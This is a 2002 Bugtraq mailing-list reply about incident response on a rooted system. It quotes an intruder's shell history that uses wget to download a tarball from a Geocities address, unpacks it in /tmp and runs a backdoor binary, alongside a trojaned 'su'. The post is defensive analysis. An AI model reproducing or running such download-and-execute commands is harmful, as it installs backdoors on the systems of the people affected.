Re: Rooted, .haos on system
From: zeno (bugtraq@cgisecurity.net)
Date: 12/16/02
- In reply to: Damian Gerow: "Re: Rooted, .haos on system"
From: zeno <bugtraq@cgisecurity.net> To: damian@sentex.net (Damian Gerow) Date: Mon, 16 Dec 2002 15:54:02 -0500 (EST)
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
Maybe you should email this dude. He wrote the exploit (or so the exploit says).
"su exploit by XP <xp@xtreme-power.com>
Enjoy!
"
Other neat stuff if you do a strings on the two filenames.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>
The domain name resolves to http://www.djteckh.com/, maybe worth checking out.
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>